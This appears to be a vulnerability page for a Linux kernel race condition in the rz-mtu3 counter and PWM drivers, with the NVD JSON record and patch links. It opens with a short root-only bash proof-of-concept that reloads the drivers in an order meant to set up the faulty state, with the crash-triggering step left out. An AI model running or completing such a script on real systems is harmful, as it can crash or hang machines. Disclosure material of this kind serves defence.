CVE-2026-31740

#!/bin/bash # PoC: Triggering the race condition by controlling module load order # This script attempts to reproduce the scenario where the dev member is overwritten. if [ "$(id -u)" -ne 0 ]; then echo "This script must be run as root." exit 1 fi echo "[+] Unloading existing drivers to reset state..." modprobe -r rz_mtu3_counter 2>/dev/null modprobe -r rz_mtu3_pwm 2>/dev/null echo "[+] Loading PWM driver first..." modprobe rz_mtu3_pwm if [ $? -ne 0 ]; then echo "[-] Failed to load PWM driver. Hardware might not be present." exit 1 fi echo "[+] Loading Counter driver second (potential overwrite of dev pointer)..." modprobe rz_mtu3_counter if [ $? -ne 0 ]; then echo "[-] Failed to load Counter driver." exit 1 fi echo "[+] Attempting to trigger Runtime PM usage via counter interface..." # In a vulnerable kernel, accessing the counter device might trigger # runtime PM calls on the PWM device structure, leading to instability. if [ -e /dev/counter0 ]; then echo "Device found. Interaction might cause kernel panic or hang." # Actual interaction code omitted to prevent system crash else echo "Counter device interface not found." fi

{"cve": {"id": "CVE-2026-31740", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-01T15:16:36.710", "lastModified": "2026-05-07T19:56:03.380", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ncounter: rz-mtu3-cnt: do not use struct rz_mtu3_channel's dev member\n\nThe counter driver can use HW channels 1 and 2, while the PWM driver can\nuse HW channels 0, 1, 2, 3, 4, 6, 7.\n\nThe dev member is assigned both by the counter driver and the PWM driver\nfor channels 1 and 2, to their own struct device instance, overwriting\nthe previous value.\n\nThe sub-drivers race to assign their own struct device pointer to the\nsame struct rz_mtu3_channel's dev member.\n\nThe dev member of struct rz_mtu3_channel is used by the counter\nsub-driver for runtime PM.\n\nDepending on the probe order of the counter and PWM sub-drivers, the\ndev member may point to the wrong struct device instance, causing the\ncounter sub-driver to do runtime PM actions on the wrong device.\n\nTo fix this, use the parent pointer of the counter, which is assigned\nduring probe to the correct struct device, not the struct device pointer\ninside the shared struct rz_mtu3_channel."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4", "versionEndExcluding": "6.6.134", "matchCriteriaId": "C1AFB41D-EE40-4D1A-93ED-E8655E9E65C4"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.7", "versionEndExcluding": "6.12.81", "matchCriteriaId": "6EF80433-B33B-43C5-8E64-0FA7B8DCE1BC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.22", "matchCriteriaId": "C9DF8BCE-36D3-475D-9D21-19E4F02F9029"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.12", "matchCriteriaId": "0A2B9540-02D5-41B4-B16A-82AF66FD4F36"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/28a371be901ef44ee03726c2575d7d6795521fe0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2932095c114b98cbb40ccf34fc00d613cb17cead", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/633dfbf0eb2766c597c1a59dd83035c82e14791d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/63be324c795262f0e316c6fe9b329d83afa1ec93", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6562290225c197e2e193a53de2a517815288dcd1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}